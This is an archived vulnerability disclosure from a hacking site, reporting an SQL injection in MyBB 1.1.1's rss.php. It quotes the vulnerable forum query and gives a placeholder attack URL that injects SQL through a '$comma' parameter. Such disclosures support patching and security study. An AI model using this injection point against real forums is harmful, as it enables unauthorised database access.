AOH :: Web BBS :: Frequently Exploited :: B06-2372.HTM

mybb v1.1.1(rss.php) SQL Injection Exploit

mybb v1.1.1(rss.php) SQL Injection Exploit
mybb v1.1.1(rss.php) SQL Injection Exploit


---------------------------------- =0D
Foud By: Breeeeh & CrAzY CrAcKeR=0D
Site: www.alshmokh.com =0D 
Email:Breeeeh@hotmail.com =0D 
----------------------------------=0D
=0D
$query = $db->query("SELECT * FROM ".TABLE_PREFIX."forums f WHERE 1=1 $forumlist");=0D
        $comma = " - ";=0D
        while($forum = $db->fetch_array($query))=0D
        {=0D
                $title .= $comma.$forum['name'];=0D
                $forumcache[$forum['fid']] = $forum;=0D
                $comma = ", ";=0D
=0D
----------------------------------=0D
=0D
Example: =0D
=0D
/rss.php?...$comma=[SQL]=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.